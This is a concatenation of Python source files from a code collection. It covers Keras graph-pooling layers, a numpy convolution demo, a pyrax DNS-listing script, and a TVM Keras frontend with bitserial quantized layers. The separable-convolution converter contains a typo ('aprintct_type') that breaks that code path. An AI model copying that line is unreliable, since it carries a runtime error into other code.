self.features_layer = Dense(self.channels,
name='features_layer',
**layer_kwargs)
self.attention_layer = Dense(self.channels,
activation='sigmoid',
name='attn_layer',
**layer_kwargs)
self.built = True
def call(self, inputs):
if self.data_mode == 'disjoint':
X, I = inputs
if K.ndim(I) == 2:
I = I[:, 0]
else:
X = inputs
inputs_linear = self.features_layer(X)
attn = self.attention_layer(X)
masked_inputs = inputs_linear * attn
if self.data_mode in {'single', 'batch'}:
output = K.sum(masked_inputs, axis=-2,
keepdims=self.data_mode == 'single')
else:
output = tf.math.segment_sum(masked_inputs, I)
return output
def compute_output_shape(self, input_shape):
if self.data_mode == 'single':
return (1,) + (self.channels,)
elif self.data_mode == 'batch':
return input_shape[:-2] + (self.channels,)
else:
output_shape = input_shape[0]
output_shape = output_shape[:-1] + (self.channels,)
return output_shape
def get_config(self):
config = {
'channels': self.channels,
'kernel_initializer': self.kernel_initializer,
'bias_initializer': self.bias_initializer,
'kernel_regularizer': self.kernel_regularizer,
'bias_regularizer': self.bias_regularizer,
'kernel_constraint': self.kernel_constraint,
'bias_constraint': self.bias_constraint,
}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
class GlobalAttnSumPool(GlobalPool):
r"""
A node-attention global pooling layer. Pools a graph by learning attention
coefficients to sum node features.
This layer computes:
$$
\alpha = \textrm{softmax}( \X \a); \\
\X' = \sum\limits_{i=1}^{N} \alpha_i \cdot \X_i
$$
where \(\a \in \mathbb{R}^F\) is a trainable vector. Note that the softmax
is applied across nodes, and not across features.
**Mode**: single, disjoint, mixed, batch.
**Input**
- Node features of shape `([batch], n_nodes, n_node_features)`;
- Graph IDs of shape `(n_nodes, )` (only in disjoint mode);
**Output**
- Pooled node features of shape `(batch, n_node_features)` (if single mode, shape will
be `(1, n_node_features)`).
**Arguments**
- `attn_kernel_initializer`: initializer for the attention weights;
- `attn_kernel_regularizer`: regularization applied to the attention kernel
matrix;
- `attn_kernel_constraint`: constraint applied to the attention kernel
matrix;
"""
def __init__(self,
attn_kernel_initializer='glorot_uniform',
attn_kernel_regularizer=None,
attn_kernel_constraint=None,
**kwargs):
super().__init__(**kwargs)
self.attn_kernel_initializer = initializers.get(
attn_kernel_initializer)
self.attn_kernel_regularizer = regularizers.get(
attn_kernel_regularizer)
self.attn_kernel_constraint = constraints.get(attn_kernel_constraint)
def build(self, input_shape):
assert len(input_shape) >= 2
if isinstance(input_shape, list) and len(input_shape) == 2:
self.data_mode = 'disjoint'
F = input_shape[0][-1]
else:
if len(input_shape) == 2:
self.data_mode = 'single'
else:
self.data_mode = 'batch'
F = input_shape[-1]
# Attention kernels
self.attn_kernel = self.add_weight(shape=(F, 1),
initializer=self.attn_kernel_initializer,
regularizer=self.attn_kernel_regularizer,
constraint=self.attn_kernel_constraint,
name='attn_kernel')
self.built = True
def call(self, inputs):
if self.data_mode == 'disjoint':
X, I = inputs
if K.ndim(I) == 2:
I = I[:, 0]
else:
X = inputs
attn_coeff = K.dot(X, self.attn_kernel)
attn_coeff = K.squeeze(attn_coeff, -1)
attn_coeff = K.softmax(attn_coeff)
if self.data_mode == 'single':
output = K.dot(attn_coeff[None, ...], X)
elif self.data_mode == 'batch':
output = K.batch_dot(attn_coeff, X)
else:
output = attn_coeff[:, None] * X
output = tf.math.segment_sum(output, I)
return output
def get_config(self):
config = {
'attn_kernel_initializer': self.attn_kernel_initializer,
'attn_kernel_regularizer': self.attn_kernel_regularizer,
'attn_kernel_constraint': self.attn_kernel_constraint,
}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
class SortPool(Layer):
r"""
A SortPool layer as described by
[Zhang et al](https://www.cse.wustl.edu/~muhan/papers/AAAI_2018_DGCNN.pdf).
This layers takes a graph signal \(\mathbf{X}\) and returns the topmost k
rows according to the last column.
If \(\mathbf{X}\) has less than k rows, the result is zero-padded to k.
**Mode**: single, disjoint, batch.
**Input**
- Node features of shape `([batch], n_nodes, n_node_features)`;
- Graph IDs of shape `(n_nodes, )` (only in disjoint mode);
**Output**
- Pooled node features of shape `(batch, k, n_node_features)` (if single mode, shape will
be `(1, k, n_node_features)`).
**Arguments**
- `k`: integer, number of nodes to keep;
"""
def __init__(self, k):
super(SortPool, self).__init__()
k = int(k)
if k <= 0:
raise ValueError("K must be a positive integer")
self.k = k
def build(self, input_shape):
if isinstance(input_shape, list) and len(input_shape) == 2:
self.data_mode = 'disjoint'
self.F = input_shape[0][-1]
else:
if len(input_shape) == 2:
self.data_mode = 'single'
else:
self.data_mode = 'batch'
self.F = input_shape[-1]
def call(self, inputs):
if self.data_mode == 'disjoint':
X, I = inputs
X = ops.disjoint_signal_to_batch(X, I)
else:
X = inputs
if self.data_mode == 'single':
X = tf.expand_dims(X, 0)
N = tf.shape(X)[-2]
sort_perm = tf.argsort(X[..., -1], direction='DESCENDING')
X_sorted = tf.gather(X, sort_perm, axis=-2, batch_dims=1)
def truncate():
_X_out = X_sorted[..., : self.k, :]
return _X_out
def pad():
padding = [[0, 0], [0, self.k - N], [0, 0]]
_X_out = tf.pad(X_sorted, padding)
return _X_out
X_out = tf.cond(tf.less_equal(self.k, N), truncate, pad)
if self.data_mode == 'single':
X_out = tf.squeeze(X_out, [0])
X_out.set_shape((self.k, self.F))
elif self.data_mode == 'batch' or self.data_mode == 'disjoint':
X_out.set_shape((None, self.k, self.F))
return X_out
def get_config(self):
config = {
'k': self.k,
}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
def compute_output_shape(self, input_shape):
if self.data_mode == 'single':
return self.k, self.F
elif self.data_mode == 'batch' or self.data_mode == 'disjoint':
return input_shape[0], self.k, self.F
layers = {
'sum': GlobalSumPool,
'avg': GlobalAvgPool,
'max': GlobalMaxPool,
'attn': GlobalAttentionPool,
'attn_sum': GlobalAttnSumPool,
'sort': SortPool
}
def get(identifier):
if identifier not in layers:
raise ValueError('Unknown identifier {}. Available: {}'
.format(identifier, list(layers.keys())))
else:
return layers[identifier] |
py | b415985ff1a3c51d794119af5bac10991d591a16 | import taichi as ti
import numpy as np
A = np.array([
[0, 1, 0],
[1, 0, 1],
[0, 1, 0],
])
def conv(A, B):
m, n = A.shape
s, t = B.shape
C = np.zeros((m + s - 1, n + t - 1), dtype=A.dtype)
for i in range(m):
for j in range(n):
for k in range(s):
for l in range(t):
C[i + k, j + l] += A[i, j] * B[k, l]
return C
B = A
print(B)
B = conv(B, A)
print(B)
B = conv(B, A)
print(B)
B = conv(B, A)
print(B)
|
py | b415997a5d6fcd6b4c8470aaf1596a267323bbda | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c)2012 Rackspace US, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import os
import pyrax
import pyrax.exceptions as exc
pyrax.set_setting("identity_type", "rackspace")
creds_file = os.path.expanduser("~/.rackspace_cloud_credentials")
pyrax.set_credential_file(creds_file)
dns = pyrax.cloud_dns
def print_domain(domain):
print("Domain:", domain.name)
print(" email:", domain.emailAddress)
print(" created:", domain.created)
print()
count = 0
iterator = dns.get_domain_iterator()
for domain in iterator:
count += 1
print_domain(domain)
print("There were a total of %s domain(s)." % count)
|
py | b41599871e4a6a8fe58b369eff5212770d249492 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, import-self
"""Keras frontend."""
from __future__ import absolute_import as _abs
import sys
import numpy as np
import tvm
from .. import ir_pass
from .. import expr as _expr
from .. import module as _module
from .. import op as _op
from ... import nd as _nd
from .common import ExprTable, new_var
from riptide.anneal.anneal_funcs import *
__all__ = ['from_keras']
def _check_data_format(keras_layer):
if hasattr(keras_layer, ('data_format')):
if keras_layer.data_format != 'channels_last':
raise ValueError("Keras frontend currently supports data_format = channels_last only.")
return
def _get_pad_pair(input1d, kernel1d, stride1d):
out1d = (input1d + stride1d - 1) // stride1d
pad = np.maximum((out1d - 1) * stride1d + kernel1d - input1d, 0)
pad_before = pad // 2
pad_after = pad - pad_before
return [pad_before, pad_after]
def _get_elu(inexpr, alpha):
"""A helper method for elu."""
return _op.negative(alpha) * _op.nn.relu(_expr.const(1., dtype='float32') - \
_op.exp(inexpr)) + _op.nn.relu(inexpr)
def _as_list(arr):
"""Force being a list, ignore if already is."""
if isinstance(arr, list):
return arr
return [arr]
def _convert_recurrent_activation(inexpr, keras_layer):
act_type = keras_layer.recurrent_activation.__name__
return _convert_activation(inexpr, act_type, None)
def _convert_activation(inexpr, keras_layer, _):
if isinstance(keras_layer, str):
act_type = keras_layer
else:
if sys.version_info.major < 3:
act_type = keras_layer.activation.func_name
else:
act_type = keras_layer.activation.__name__
if act_type == 'linear':
if isinstance(keras_layer, str):
return inexpr
alpha = keras_layer.alpha if hasattr(keras_layer, 'alpha') else 1.
beta = keras_layer.beta if hasattr(keras_layer, 'beta') else 0.
alpha = _expr.const(alpha, dtype='float32')
beta = _expr.const(beta, dtype='float32')
return _op.add(_op.multiply(inexpr, alpha), beta)
if act_type == 'softmax':
return _op.nn.softmax(inexpr, axis=1)
if act_type == 'sigmoid':
return _op.sigmoid(inexpr)
if act_type == 'tanh':
return _op.tanh(inexpr)
if act_type == 'relu':
return _op.nn.relu(inexpr)
if act_type == 'softplus':
return _op.log(_op.add(_op.exp(inexpr), _expr.const(1., dtype='float32')))
if act_type == 'elu':
alpha = keras_layer.alpha if hasattr(keras_layer, 'alpha') else 1.
alpha = _expr.const(alpha, dtype='float32')
return _get_elu(inexpr, alpha)
if act_type == 'selu':
# Alpha, Gamma values obtained from https://arxiv.org/abs/1706.02515
alpha = keras_layer.alpha if hasattr(keras_layer, 'alpha') \
else 1.6732632423543772848170429916717
gamma = keras_layer.gamma if hasattr(keras_layer, 'gamma') \
else 1.0507009873554804934193349852946
alpha = _expr.const(alpha, dtype='float32')
gamma = _expr.const(gamma, dtype='float32')
return gamma * _get_elu(inexpr, alpha)
if act_type == 'relu6':
return _op.clip(inexpr, a_min=0., a_max=6.)
if act_type == 'softsign':
return inexpr / (_expr.const(1., dtype='float32') + _op.abs(inexpr))
if act_type == 'hard_sigmoid':
x = (_expr.const(0.2, dtype='float32') * inexpr) + _expr.const(0.5, dtype='float32')
return _op.clip(x, a_min=0., a_max=1.)
raise tvm.error.OpNotImplemented(
'Operator {} is not supported in frontend Keras.'.format(act_type))
def _convert_advanced_activation(inexpr, keras_layer, etab):
act_type = type(keras_layer).__name__
if act_type == 'ReLU':
if keras_layer.max_value:
return _op.clip(inexpr, a_min=0., a_max=float(keras_layer.max_value))
return _op.nn.relu(inexpr)
if act_type == 'LeakyReLU':
return _op.nn.leaky_relu(inexpr, alpha=float(keras_layer.alpha))
if act_type == 'ELU':
alpha = keras_layer.alpha if hasattr(keras_layer, 'alpha') else 1.
alpha = _expr.const(alpha, dtype='float32')
return _get_elu(inexpr, alpha)
if act_type == 'PReLU':
assert hasattr(keras_layer, 'alpha'), "alpha required for PReLU."
_check_data_format(keras_layer)
size = len(keras_layer.alpha.shape)
alpha = etab.new_const(keras_layer.get_weights()[0] \
.transpose(np.roll(range(size), 1)))
return _op.negative(alpha) * _op.nn.relu(_op.negative(inexpr)) + _op.nn.relu(inexpr)
if act_type == 'ThresholdedReLU':
theta = keras_layer.theta if hasattr(keras_layer, 'theta') else 1.
return _op.multiply(inexpr, _op.greater(inexpr, \
_expr.const(theta, dtype='float32')).astype('float32'))
raise tvm.error.OpNotImplemented(
'Operator {} is not supported in frontend Keras.'.format(act_type))
def _convert_merge(inexpr, keras_layer, _):
merge_type = type(keras_layer).__name__
ret = inexpr[0]
if merge_type == 'Subtract':
assert len(inexpr) == 2, "Subtract merge takes 2 inputs."
ret = _op.subtract(ret, inexpr[1])
elif merge_type in ['Add', 'Multiply', 'Maximum']:
op_map = {'Add':_op.add, 'Multiply':_op.multiply, 'Maximum':_op.maximum}
for i in range(1, len(inexpr)):
ret = op_map[merge_type](ret, inexpr[i])
elif merge_type == 'Average':
for i in range(1, len(inexpr)):
ret = _op.add(ret, inexpr[i])
ret = ret / _expr.const(len(inexpr), dtype='float32')
else:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported in frontend Keras.'.format(merge_type))
return ret
def _convert_dense(inexpr, keras_layer, etab):
weightList = keras_layer.get_weights()
weight = etab.new_const(weightList[0].transpose([1, 0]))
params = {'weight':weight, 'units':weightList[0].shape[1]}
input_shape = keras_layer.input_shape
input_dim = len(input_shape)
# In case of RNN dense, input shape will be (1, 1, n)
if input_dim > 2:
input_shape = tuple(dim if dim else 1 for dim in _as_list(input_shape)[0])
if input_dim != 3 or input_shape[0] != 1 or input_shape[1] != 1:
raise tvm.error.OpAttributeInvalid(
'Input shape {} is not valid for operator Dense.'.format(input_shape))
inexpr = _op.squeeze(inexpr, axis=0)
out = _op.nn.dense(data=inexpr, **params)
if keras_layer.use_bias:
bias = etab.new_const(weightList[1])
out = _op.nn.bias_add(out, bias)
# defuse activation
if sys.version_info.major < 3:
act_type = keras_layer.activation.func_name
else:
act_type = keras_layer.activation.__name__
if act_type != 'linear':
out = _convert_activation(out, act_type, etab)
if input_dim > 2:
out = _op.expand_dims(out, axis=0)
return out
def _convert_convolution(inexpr, keras_layer, etab):
_check_data_format(keras_layer)
is_deconv = type(keras_layer).__name__ == 'Conv2DTranspose'
is_depthconv = type(keras_layer).__name__ == 'DepthwiseConv2D'
weightList = keras_layer.get_weights()
if etab.data_layout == 'NHWC':
kernel_layout = 'HWIO'
else:
kernel_layout = 'OIHW'
weight = weightList[0]
if is_deconv:
kernel_h, kernel_w, n_filters, in_channels = weightList[0].shape
if kernel_layout == 'OIHW':
weight = weight.transpose([3, 2, 0, 1])
elif is_depthconv:
kernel_h, kernel_w, in_channels, depth_mult = weightList[0].shape
if kernel_layout == 'OIHW':
weight = weight.transpose([2, 3, 0, 1])
else:
weight = weight.transpose([0, 1, 3, 2])
elif etab.data_layout == 'NCHW':
kernel_h, kernel_w, in_channels, n_filters = weightList[0].shape
weight = weightList[0].transpose([3, 2, 0, 1])
else:
kernel_h, kernel_w, in_channels, n_filters = weightList[0].shape
weight = weightList[0]
if isinstance(keras_layer.dilation_rate, (list, tuple)):
dilation = [keras_layer.dilation_rate[0], keras_layer.dilation_rate[1]]
else:
dilation = [keras_layer.dilation_rate, keras_layer.dilation_rate]
dilated_kernel_h = (kernel_h - 1) * dilation[0] + 1
dilated_kernel_w = (kernel_w - 1) * dilation[1] + 1
stride_h, stride_w = keras_layer.strides
params = {'weight': etab.new_const(weight),
'kernel_size': [kernel_h, kernel_w],
'strides': [stride_h, stride_w],
'dilation': dilation,
'padding': [0, 0],
'data_layout': etab.data_layout,
'kernel_layout': kernel_layout}
if is_depthconv:
params['channels'] = in_channels * depth_mult
params['groups'] = in_channels
else:
params['channels'] = n_filters
if keras_layer.padding == 'valid':
pass
# we insert a separate pad operator
elif keras_layer.padding == 'same':
in_h = keras_layer.input_shape[1]
in_w = keras_layer.input_shape[2]
pad_t, pad_b = _get_pad_pair(in_h, dilated_kernel_h, stride_h)
pad_l, pad_r = _get_pad_pair(in_w, dilated_kernel_w, stride_w)
if etab.data_layout == 'NHWC':
params['padding'] = (pad_t, pad_l, pad_b, pad_r)
elif pad_t == pad_b and pad_l == pad_r:
params['padding'] = (pad_t, pad_l)
else:
if etab.data_layout == 'NCHW':
inexpr = _op.nn.pad(data=inexpr, pad_width=(
(0, 0), (0, 0), (pad_t, pad_b), (pad_l, pad_r)))
else:
inexpr = _op.nn.pad(data=inexpr, pad_width=(
(0, 0), (pad_t, pad_b), (pad_l, pad_r), (0, 0)))
else:
msg = 'Padding with {} is not supported for operator Convolution ' \
'in frontend Keras.'
raise tvm.error.OpAttributeUnimplemented(msg.format(keras_layer.padding))
if is_deconv:
out = _op.nn.conv2d_transpose(data=inexpr, **params)
else:
out = _op.nn.conv2d(data=inexpr, **params)
if keras_layer.use_bias:
bias = etab.new_const(weightList[1])
if etab.data_layout == 'NCHW':
out = _op.nn.bias_add(out, bias)
else:
out = _op.nn.bias_add(out, bias, axis=-1)
# defuse activation
if sys.version_info.major < 3:
act_type = keras_layer.activation.func_name
else:
act_type = keras_layer.activation.__name__
if act_type != 'linear':
out = _convert_activation(out, act_type, etab)
return out
def _convert_separable_convolution(inexpr, keras_layer, etab):
_check_data_format(keras_layer)
weightList = keras_layer.get_weights()
# depthwise conv
kernel_h, kernel_w, in_channels, depth_mult = weightList[0].shape
stride_h, stride_w = keras_layer.strides
weight0 = weightList[0].transpose([2, 3, 0, 1])
params0 = {'weight': etab.new_const(weight0),
'channels': in_channels * depth_mult,
'groups': in_channels,
'kernel_size': [kernel_h, kernel_w],
'strides': [stride_h, stride_w],
'dilation': [1, 1],
'padding': [0, 0]}
if keras_layer.padding == 'valid':
pass
# we insert a separate pad operator
elif keras_layer.padding == 'same':
in_h = keras_layer.input_shape[1]
in_w = keras_layer.input_shape[2]
pad_t, pad_b = _get_pad_pair(in_h, kernel_h, stride_h)
pad_l, pad_r = _get_pad_pair(in_w, kernel_w, stride_w)
if pad_t == pad_b and pad_l == pad_r:
params0['padding'] = (pad_t, pad_l)
else:
inexpr = _op.nn.pad(data=inexpr, pad_width=(
(0, 0), (0, 0), (pad_t, pad_b), (pad_l, pad_r)))
else:
msg = 'Padding with {} is not supported for operator Separable ' \
'Convolution in frontend Keras.'
raise tvm.error.OpAttributeUnimplemented(msg.format(keras_layer.padding))
depthconv = _op.nn.conv2d(data=inexpr, **params0)
# pointwise conv
weight1 = weightList[1].transpose([3, 2, 0, 1])
params1 = {'weight': etab.new_const(weight1),
'channels': weight1.shape[0],
'groups': 1,
'kernel_size': [1, 1],
'strides': [1, 1],
'dilation': [1, 1]}
out = _op.nn.conv2d(data=depthconv, **params1)
if keras_layer.use_bias:
bias = etab.new_const(weightList[2])
out = _op.nn.bias_add(out, bias)
# defuse activation
if sys.version_info.major < 3:
act_type = keras_layer.activation.func_name
else:
act_type = keras_layer.activation.__name__
if act_type != 'linear':
out = _convert_activation(out, aprintct_type, etab)
return out
def _convert_flatten(inexpr, keras_layer, etab):
_check_data_format(keras_layer)
# NCHW -> NHWC so that dense can be correctly converted
if etab.data_layout == 'NCHW':
inexpr = _op.transpose(inexpr, axes=[0, 2, 3, 1])
return _op.nn.batch_flatten(inexpr)
def _convert_pooling(inexpr, keras_layer, etab):
_check_data_format(keras_layer)
pool_type = type(keras_layer).__name__
# global pool in keras = global pool + flatten in nnvm/relay
global_pool_params = {'layout' : etab.data_layout}
if pool_type == 'GlobalMaxPooling2D':
return _convert_flatten(_op.nn.global_max_pool2d(inexpr, **global_pool_params), keras_layer, etab)
if pool_type == 'GlobalAveragePooling2D':
if etab.data_layout == 'NCHW':
return _op.nn.global_avg_pool2d(inexpr, **global_pool_params)
elif etab.data_layout == "NHWC":
return _convert_flatten(_op.nn.global_avg_pool2d(inexpr, **global_pool_params), keras_layer, etab)
pool_h, pool_w = keras_layer.pool_size
stride_h, stride_w = keras_layer.strides
params = {'pool_size': [pool_h, pool_w],
'strides': [stride_h, stride_w],
'padding': [0, 0],
'layout': etab.data_layout}
if keras_layer.padding == 'valid':
pass
elif keras_layer.padding == 'same':
in_h = keras_layer.input_shape[1]
in_w = keras_layer.input_shape[2]
pad_t, pad_b = _get_pad_pair(in_h, pool_h, stride_h)
pad_l, pad_r = _get_pad_pair(in_w, pool_w, stride_w)
params['padding'] = [pad_t, pad_l, pad_b, pad_r]
else:
raise tvm.error.OpAttributeUnimplemented(
'Padding with {} is not supported in operator Pooling.'.format(keras_layer.padding))
if pool_type == 'MaxPooling2D':
return _op.nn.max_pool2d(inexpr, **params)
if pool_type == 'AveragePooling2D':
params['count_include_pad'] = False
return _op.nn.avg_pool2d(inexpr, **params)
raise tvm.error.OpNotImplemented(
'Operator {} is not supported for frontend Keras.'.format(keras_layer))
def _convert_upsample(inexpr, keras_layer, _):
_check_data_format(keras_layer)
upsample_type = type(keras_layer).__name__
if upsample_type == 'UpSampling1D':
h = keras_layer.size
params = {'scale': h}
elif upsample_type == 'UpSampling2D':
h, w = keras_layer.size
if h != w:
raise tvm.error.OpAttributeInvalid(
'Height must equal width for operator Upsample.')
params = {'scale': h}
if hasattr(keras_layer, 'interpolation'):
interpolation = keras_layer.interpolation
if interpolation == 'nearest':
params['method'] = 'NEAREST_NEIGHBOR'
else:
params['method'] = 'BILINEAR'
elif upsample_type == 'UpSampling3D':
h, w, d = keras_layer.size
if h != w or w != d:
raise tvm.error.OpAttributeInvalid(
'Height, width, and depth must all be equal for operator Upsample.')
params = {'scale': h}
else:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported for frontend Keras.'.format(upsample_type))
return _op.nn.upsampling(inexpr, **params)
def _convert_cropping(inexpr, keras_layer, _):
_check_data_format(keras_layer)
crop_type = type(keras_layer).__name__
if crop_type == 'Cropping2D':
(_, in_h, in_w, _) = keras_layer.input_shape
((crop_t, crop_b), (crop_l, crop_r)) = keras_layer.cropping
else:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported for frontend Keras.'.format(crop_type))
int32_max = np.iinfo(np.int32).max
return _op.strided_slice(inexpr, begin=[0, 0, crop_t, crop_l], \
end=[int32_max, int32_max, in_h-crop_b, in_w-crop_r])
def _convert_enter_integer(inexpr, keras_layer, etab):
# Extract layer information
scale = _expr.const(keras_layer.scale, dtype='float32')
bit_range = _expr.const(2**(keras_layer.bits - 1), dtype='float32')
inexpr = inexpr * scale
# Now quantize input
inexpr = _op.clip(inexpr, a_min=0., a_max=1.)
inexpr = _op.round(bit_range * inexpr)
inexpr = _op.cast(inexpr, 'int8')
return inexpr
def _convert_sawb_conv2d(inexpr, keras_layer, etab):
name = 'resnet18/' + keras_layer.name + '/kernel'
if etab.sawb_scales is None:
sawb_scale = 2.2
else:
sawb_scale = etab.sawb_scales[name] # multiplier for the sawb
pact_alpha = keras_layer.parent.alpha.numpy()
pact_scale = pact_alpha / (float(2**etab.activation_bits - 1)) # multiplier for the pact
x = _convert_bitserial_convolution(inexpr, keras_layer, etab)
x = _op.cast(x, dtype='float32')
x = x * _expr.const(pact_scale * sawb_scale)
return x
def _convert_bitserial_convolution(inexpr, keras_layer, etab):
_check_data_format(keras_layer)
# Note: Overriding this to use our checkpoint weights
if etab.tf_params is None:
weightList = keras_layer.get_weights()
else:
name = 'resnet18/' + keras_layer.name + '/kernel'
weightList = [etab.tf_params[name]]
kernel_h, kernel_w, in_channels, n_filters = weightList[0].shape
# NHWC Actually needs HWIO, use OIHW for NCHW as below.
if etab.data_layout == 'NCHW':
weight = weightList[0].transpose([3, 2, 0, 1])
kernel_layout = 'BOIHW'
else:
weight = weightList[0]
kernel_layout = 'HWBIO'
if isinstance(keras_layer.dilation_rate, (list, tuple)):
dilation = [keras_layer.dilation_rate[0], keras_layer.dilation_rate[1]]
else:
dilation = [keras_layer.dilation_rate, keras_layer.dilation_rate]
dilated_kernel_h = (kernel_h - 1) * dilation[0] + 1
dilated_kernel_w = (kernel_w - 1) * dilation[1] + 1
stride_h, stride_w = keras_layer.strides
# Quantize and bitpack weights. - Weights are passed in pre-quantized, but not yet bitpacked
if etab.tf_params is None:
weight = (weight > 0).astype('int16')
weight = _op.cast(etab.new_const(weight), 'int16')
else:
weight = etab.new_const(weight)
if etab.data_layout == 'NCHW':
q_weight = _op.nn.bitpack(weight, bits=etab.weight_bits, pack_axis=1, bit_axis=0, pack_type='uint8')
else:
q_weight = _op.nn.bitpack(weight, bits=etab.weight_bits, pack_axis=2, bit_axis=2, pack_type='uint8')
params = {'weight': q_weight,
'kernel_size': [kernel_h, kernel_w],
'strides': [stride_h, stride_w],
'padding': [0, 0],
'activation_bits': etab.activation_bits,
'weight_bits': etab.weight_bits,
'out_dtype': 'int16',
'pack_dtype': 'uint8',
'kernel_layout': kernel_layout,
'data_layout': etab.data_layout}
params['channels'] = n_filters
if keras_layer.padding == 'valid':
params['padding'] = (0, 0, 0, 0)
elif keras_layer.padding == 'same':
in_h = keras_layer.input_shape[1]
in_w = keras_layer.input_shape[2]
pad_t, pad_b = _get_pad_pair(in_h, dilated_kernel_h, stride_h)
pad_l, pad_r = _get_pad_pair(in_w, dilated_kernel_w, stride_w)
params['padding'] = (pad_t, pad_l, pad_b, pad_r)
else:
msg = 'Padding with {} is not supported for operator Convolution ' \
'in frontend Keras.'
raise tvm.error.OpAttributeUnimplemented(msg.format(keras_layer.padding))
out = _op.nn.bitserial_conv2d(data=inexpr, **params)
if keras_layer.use_bias:
bias = etab.new_const(weightList[1])
if etab.data_layout == 'NCHW':
out = _op.nn.bias_add(out, bias)
else:
out = _op.nn.bias_add(out, bias, axis=-1)
# defuse activation
act_type = keras_layer.activation.__name__
if act_type != 'linear':
out = _convert_activation(out, act_type, etab)
return out
def _convert_bitserial_dense(inexpr, keras_layer, etab):
weightList = keras_layer.get_weights()
# Quantize and pack weight.
weight = weightList[0].transpose([1, 0])
weight = (weight > 0).astype('int16')
weight = _op.cast(etab.new_const(weight), 'int16')
q_weight = _op.nn.bitpack(weight, bits=etab.weight_bits, pack_axis=1, bit_axis=1, pack_type='uint8')
params = {
'weight': q_weight,
'units': weightList[0].shape[1],
'data_bits': etab.activation_bits,
'weight_bits': etab.weight_bits,
'out_dtype': 'int16',
'pack_dtype': 'uint8'
}
input_shape = keras_layer.input_shape
input_dim = len(input_shape)
out = _op.nn.bitserial_dense(data=inexpr, **params)
if keras_layer.use_bias:
bias = etab.new_const(weightList[1])
out = _op.nn.bias_add(out, bias)
# defuse activation
act_type = keras_layer.activation.__name__
if act_type != 'linear':
out = _convert_activation(out, act_type, etab)
return out
# Quantize: Maps floating point to low bit int
def quantize(x, abits, etab):
x = _op.clip(x, 0.0, 1.0)
x = x * _op.cast(etab.new_const((1 << abits) - 1), 'float32') + _op.cast(etab.new_const(0.5), 'float32')
x = _op.cast(x, dtype='int8')
return x
# Dequantize: Maps low bit int back to floating point
def dquantize(x, keras_layer, etab):
wbits = etab.weight_bits
abits = keras_layer.bits
x = _op.cast(x, dtype='float32')
x = x * _op.cast(_expr.const(1.0 / (((2.0 ** abits)-1)*((2.0 ** wbits)-1))), 'float32')
return x
def _convert_scalu(inexpr, keras_layer, etab):
scale = etab.new_const(keras_layer.scale.numpy())
return inexpr * scale
def _convert_pact(inexpr, keras_layer, etab):
# Read in the alpha from passed in list
alpha = keras_layer.alpha.numpy()
a_bits = keras_layer.bits
scale = float((2**a_bits)-1) / alpha
# Clip, convert to integer, and cast
x = _op.clip(inexpr, 0.0, alpha)
x = _op.round(x * _expr.const(scale))
return _op.cast(x, 'int8')
def _convert_batchnorm(inexpr, keras_layer, etab):
if etab.data_layout == 'NCHW' or len(keras_layer.input_shape) < 4:
axis = 1
else:
axis = 3
params = {'scale': False,
'center': False,
'epsilon': keras_layer.epsilon,
'axis' : axis}
idx = 0
if keras_layer.scale:
params['scale'] = True
gamma = keras_layer.get_weights()[idx]
params['gamma'] = etab.new_const(gamma)
idx += 1
if keras_layer.center:
params['center'] = True
beta = keras_layer.get_weights()[idx]
params['beta'] = etab.new_const(beta)
idx += 1
moving_mean = keras_layer.get_weights()[idx]
moving_var = keras_layer.get_weights()[idx + 1]
params['moving_mean'] = etab.new_const(moving_mean)
params['moving_var'] = etab.new_const(moving_var)
if 'gamma' not in params.keys():
params['gamma'] = etab.new_const(np.ones_like(moving_mean))
if 'beta' not in params.keys():
params['beta'] = etab.new_const(np.zeros_like(moving_mean))
result, moving_mean, moving_var = _op.nn.batch_norm(inexpr, **params)
return result
def _convert_padding(inexpr, keras_layer, _):
_check_data_format(keras_layer)
padding_type = type(keras_layer).__name__
padding = keras_layer.padding
top = left = bottom = right = 0
if padding_type == 'ZeroPadding2D':
if isinstance(padding, int):
top = left = bottom = right = padding
elif isinstance(padding, tuple):
if isinstance(padding[0], int):
top, left = padding
bottom, right = padding
elif isinstance(padding[0], tuple):
top, bottom = padding[0]
left, right = padding[1]
else:
msg = 'Value {} in attribute "padding" of operator Padding ' \
'is not valid.'
raise tvm.error.OpAttributeInvalid(msg.format(str(padding)))
else:
msg = 'Value {} in attribute "padding" of operator Padding is ' \
'not valid.'
raise tvm.error.OpAttributeInvalid(msg.format(str(padding)))
else:
msg = 'Operator {} is not supported in frontend Keras.'
raise tvm.error.OpNotImplemented(msg.format(padding_type))
return _op.nn.pad(data=inexpr,
pad_width=((0, 0), (0, 0), (top, bottom), (left, right)))
def _convert_concat(inexpr, keras_layer, _):
_check_data_format(keras_layer)
return _op.concatenate(_as_list(inexpr), axis=1)
def _convert_reshape(inexpr, keras_layer, _):
_check_data_format(keras_layer)
ch = keras_layer.input_shape[-1]
assert ch == keras_layer.target_shape[-1], \
"Only supports last dimension in target shape being equal to " \
"the channel number of input tensor."
shape = (-1, ch) + keras_layer.target_shape[:-1]
return _op.reshape(inexpr, newshape=shape)
def _convert_lstm(inexpr, keras_layer, etab):
_check_data_format(keras_layer)
if not isinstance(inexpr, list):
buf = np.zeros((1, keras_layer.units), 'float32')
